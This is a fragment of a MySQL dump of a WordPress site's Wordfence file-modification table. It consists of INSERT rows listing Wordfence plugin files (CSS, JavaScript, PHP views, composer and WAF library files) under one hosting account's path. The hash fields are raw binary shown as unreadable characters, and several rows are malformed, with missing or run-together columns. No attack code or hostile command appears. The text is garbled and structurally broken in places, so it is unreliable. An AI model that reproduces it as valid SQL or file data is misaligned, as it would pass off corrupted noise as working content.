W\"{Ozk','',0,'?'),('wgj3y_.܈[','wp-content/plugins/wordfence/modules/login-security/css/colorbox.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/css/colorbox.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kXZb5','[\0NEggdq\r*\'I','',0,'?'),('X {4y','wp-content/plugins/wordfence/modules/login-security/css/login.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/css/login.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZeBϖajo','_j1\\Qv4|%it9|:Fk4','',0,'?'),(':rtD1ν_a','wp-content/plugins/wordfence/modules/login-security/css/woocommerce-account.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/css/woocommerce-account.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oڏ36\r\"5','ab@/xV&2b{x_G\0K','',0,'?'),('ow*\nΛ΢GҜ]','wp-content/plugins/wordfence/modules/login-security/img/header.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/img/header.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p]j-','8#̄(8O\" +h\"Fb','',0,'?'),('} CwXTC','wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m]a\\$','Ǘh?S):i@h.Xg','',0,'?'),('\\1݃%VE|Bg&YY4(O','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h^n=(&݂N&','SDIB z_-?(YpEyƹA','',0,'?'),('H%,','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|%;wQ8@','wi>6Ƭ4.NC\Z4IO','',0,'?'),('b0݀>j\"G','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$2J','/#?TiOLyvuTKɤ\\ػ','',0,'?'),('1V\"${','wp-content/plugins/wordfence/modules/login-security/js/admin-global.1695657196.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/admin-global.1695657196.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q!\0𭀠\'','W4$a\'x-Kμ#Z','',0,'?'),('Q(\\}h','wp-content/plugins/wordfence/modules/login-security/js/admin.1695657196.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/admin.1695657196.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1Ya(~D4X<','m_fg ]B{#2\rAb','',0,'?'),('Oc%','wp-content/plugins/wordfence/modules/login-security/js/chart.umd.1695657196.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/chart.umd.1695657196.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b?\\ٰYgD\rz','Od :X RU+@9','',0,'?'),('UMV \\gZ ]o`','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1695657196.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1695657196.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lYZiਆ3\02[','(A#F~+FghS.b','',0,'?'),('r9R;Q7K','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1695657196.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1695657196.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lWeU{9','G8=\0> 3wg3.4','',0,'?'),('2*w’','wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1695657196.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1695657196.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԹXp`me<','wP\0pzuYDSz(WߥP3$S','',0,'?'),('6JXsM<A[w','wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1695657196.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1695657196.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\}\"7ڷDZ','.IH\Zg\0H!7`gޠZzȄž6|','',0,'?'),('Z)S4F\\','wp-content/plugins/wordfence/modules/login-security/js/login.1695657196.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/js/login.1695657196.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{6KMw','\nFд!4i\0.\Zoo','',0,'?'),('dtS0[\\Og:','wp-content/plugins/wordfence/modules/login-security/views/.htaccess','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aabvr','C\'r9@Kކtw#@k','',0,'?'),('@~}cQ\'J','wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~vY꽊XDO','',0,'?'),('4#հ}','wp-content/plugins/wordfence/modules/login-security/views/manage/code.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/manage/code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_29,HK','\0Ø>$Y^!L晚 ez5G_E','',0,'?'),('O潼m$݋&_','wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/MaW','dJ[PrMV\ZCmX','',0,'?'),('wFȶ# ','wp-content/plugins/wordfence/modules/login-security/views/manage/grace-period.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/manage/grace-period.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ej-=\n','WOT6W[ܺ\r$xC^','',0,'?'),('#\' ~/zF','wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jҫ%e\0ϻ','-ߟ&(:4h??Or`sHh','',0,'?'),('EB3A-\r&!T','wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͓/qa)^=f?','Ձ e?zcZ\nG','',0,'?'),('sݜÞ3','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m@A\nmy33* ','!4Uɨ6Z-XZ\"@TX','',0,'?'),('uC~7\nWe','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Ko`U','4C x̶Q\n*7','',0,'?'),('mAp 1GU/','wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؑ4䊕x1V','\Z|%\0ƒ^x\n?ֿx','',0,'?'),('F m','wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+ʸx53z','?aaU\'9,鮟nC5\"6?','',0,'?'),('b+aXX','wp-content/plugins/wordfence/modules/login-security/views/options/option-ntp.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-ntp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<S\n0߸?C}O','*\Z]a1L&U,gApt@T','',0,'?'),(';d+;C?','wp-content/plugins/wordfence/modules/login-security/views/options/option-roles.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-roles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F޿y\0A^E=','ڟݑ2it/WpƆ0 _,;','',0,'?'),('낏\r?8[9kQ\'s','wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܈Vit','',0,'?'),('8=[ձ','wp-content/plugins/wordfence/modules/login-security/views/page/manage.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/page/manage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H\\n\'}.KsG','W/\\})*bzioرѷ','',0,'?'),('CIS7<','wp-content/plugins/wordfence/modules/login-security/views/page/page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/page/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ш>\\gǡ$c','iiGCNFL)7%ʙ','',0,'?'),('[9J=\nuE\0O\n\\P','wp-content/plugins/wordfence/modules/login-security/views/page/permission-denied.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/page/permission-denied.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','κ2}','[,zDtWo՟٨E ','',0,'?'),('\ZL6N1;8','wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g]>p','u3}(%&Tf_\"dKi6Fxphl','',0,'?'),('g[z\0ή','wp-content/plugins/wordfence/modules/login-security/views/page/settings.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/page/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݤ)e&vW4 ',']Z*W!OeHv8al|\r 30','',0,'?'),('T\rfV+ j','wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gxXJTbx','fx/xG\n856 Z+','',0,'?'),('˩6f/6YjI\0W','wp-content/plugins/wordfence/modules/login-security/views/settings/options.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/settings/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fq+fw\0','̦bF׮C~u;m}PaM2,0S,','',0,'?'),('Yg$zH.Y','wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','嚚Oׅ.(\r\"\Z\0Z','΂:Dz=k:E7[eV%b3r\Z','',0,'?'),('yxx4* ','wp-content/plugins/wordfence/modules/login-security/views/user/grace-period-toggle.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/modules/login-security/views/user/grace-period-toggle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j7 7=`8','ztXxuV\0','',0,'?'),('dkJQAw6im','O@b_رLSt4','',0,'?'),('vFI2hn','wp-content/plugins/wordfence/readme.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BxS@&U5iѽ`eo','YgƵ1%+<=y|<','',0,'?'),('; Lt׬Cɣ','wp-content/plugins/wordfence/tmp/.htaccess','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/tmp/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Iz~i,L',' HQIqzڤp9C4>H3G','',0,'?'),('\"C*.','wp-content/plugins/wordfence/vendor/.htaccess','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\"xK{8dS','C\'r9@Kކtw#@k','',0,'?'),('=S6aXo,2','wp-content/plugins/wordfence/vendor/autoload.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7ln_pBH5!5=(','3-g,ӌ=$ g7Ӫ:V10h','',0,'?'),('_k4!*}݄ ','wp-content/plugins/wordfence/vendor/composer/ClassLoader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"UE\"Eb;Dn','Աrg CXJU1։Ya,1','',0,'?'); INSERT INTO `wpvt_wffilemods` (`filenameMD5`, `filename`, `real_path`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES ('qEv{Z[','wp-content/plugins/wordfence/vendor/composer/InstalledVersions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/InstalledVersions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q~f\"','p,-gWԎW.cEM','',0,'?'),('0&Y','wp-content/plugins/wordfence/vendor/composer/LICENSE','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']_#D\0','\Z ے%4~N~Gh!b:wɌ\'','',0,'?'),('\"0rN1M#','wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ytP>RaS@-','u{4sJ3H6owr','',0,'?'),('t!\Z%\n','wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5,}vĨ3G)','Er4@\0ԡ$z3$l\Z`iexl','',0,'?'),('s ˱Y*uO','wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^ˀJΗrhZ/Na$',' :H0v=T$bԆ^s\\71͐','',0,'?'),('~Ӹbc\Z$@$*','wp-content/plugins/wordfence/vendor/composer/autoload_real.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8b;=YXJ)շ','̆%\rNn_n\'EݸږW{=D','',0,'?'),('!֐(yJo*J','wp-content/plugins/wordfence/vendor/composer/autoload_static.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6 PWn\"b','EgpԨwh.3\nfN','',0,'?'),(']mٲ ▭','wp-content/plugins/wordfence/vendor/composer/installed.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MX\"ƷU]\\','*5œ,VuC*_o1\nPC\rF','',0,'?'),('xxj^׀','wp-content/plugins/wordfence/vendor/composer/installed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/composer/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$SNRcg..3','}[VD痎xc0{\'x v','',0,'?'),('Ɖ3S+c,N5','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/ControlByte.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/ControlByte.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' =x$/\"','HE* dǭl)z8Ӷ','',0,'?'),(' dW9Ys[','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DataFieldParser.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DataFieldParser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DatabaseMetadata.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/DatabaseMetadata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I}b~ LMQ','WVXHWrrt (oOj*6','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/FormatException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/FormatException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EosCg.h#;a`','\rӃEQŹio?,ԜUP>k4','',0,'?'),('VÄnͲ$ mqh','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleIpVersionException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleIpVersionException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϷN=|Уwu','$,oo]҇fY {B\\\0Q_n','',0,'?'),(' ,+E&*tӁhgN','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleVersionException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleVersionException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|7.Q\rV','\'/.׮\rf=П&ōܐ5j!{\0WQP','',0,'?'),('GI2Bxf!\'','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidArgumentException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidArgumentException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k瑿reUB]','yIpQ)<5Oo-9jWSz[,','',0,'?'),('~c*c{i','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidIpAddressException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidIpAddressException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9 TD$FgiEn',' S]S(nZ\0ʲ','',0,'?'),('⮘ Fw\0','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidOperationException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/InvalidOperationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kEmi[tRa','Xj/+M@Dpeϫů/-pQ0Vɂ','',0,'?'),('\Zl8/~','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IoException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IoException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sӔ\"Ku#','|*~rǪ byDRãAx','',0,'?'),('\nNLd.#','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddressInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddressInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y[ǡhb','2bVCΖzMOp26ݢׁ','',0,'?'),('pqKg4k','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Node.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Node.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vK*ۜ\"I;','',0,'?'),('Pdc3','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.<$E\0g:T ','ƝER%f\\ɾ\r v8C^h','',0,'?'),(',`ttb7','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MP<^fG C ','V$oBޞjf0֫QxuT=a`K','',0,'?'),('^Q6lJ! ͦ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \\oN.','>4i3|v1N6wD)Mjr','',0,'?'),('߹V=\"#n ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_-T\02L-','ȴgA]z-ۣ᷸[','',0,'?'),('rMܴ-\nS','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eRr#U犏','sGdlIB-?`7|rR3V','',0,'?'),('X/\0 ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iJB !<\0','V4^CD\Z;Uz','',0,'?'),('n09jv8\"','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ef!77#2A','QO|R)VqCW( @@+','',0,'?'),('ҭ_VlKg!p1','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J3 X#[ϊPq','f1`H7)dy>O\\.Ãm[ĝ','',0,'?'),('&9 -Z','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/shutdown.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/shutdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0E9c=\' \0','xٵ;Pi|:\r\riHäa','',0,'?'),('!O4bCRRfO','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d\nrCO߶a','2tӑ @fjxm>*4','',0,'?'),('IW9aW3(','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@J\'l91;,','p`; 倓$׌| tk','',0,'?'),('c[b]ݽJF','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I]U Xg','TϚ-1 [@./i󒶦iq0o ','',0,'?'),(' СqD֚?iX','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']{9{,\"',':7Ak(Fqgޱ+]>!','',0,'?'),('\'`F̔~Ė','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C؍0+C','`>&i(ŹCf&>Y\" ','',0,'?'),('n{Oǟ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I,0`-= OxH','ⰁmWka2Sj>\"w<','',0,'?'),('Aػ#\"j','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J<1/%$J=Δ','vp eKK798','',0,'?'),('Q6K4H','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xAI6mNdSpVBׇ','Z?RA+7#C-\\4g[o?J_g','',0,'?'),('rI\0ygE!2 \0C','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' n{\00U$','G\nKsI\'my9\ZVD\\:ć','',0,'?'),('j)nQ8ޮD','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"t0,06<','Q#f9;8*B3Wao3Fc','',0,'?'),('{ \rSlſ ','wp-content/plugins/wordfence/views/.htaccess','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\"xK{8dS','C\'r9@Kކtw#@k','',0,'?'),(':f?bj.','wp-content/plugins/wordfence/views/blocking/block-list.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/views/blocking/block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t2&s Ԩ','ՏI#er`-uWQQ','',0,'?'),('r7/y*aڛP] 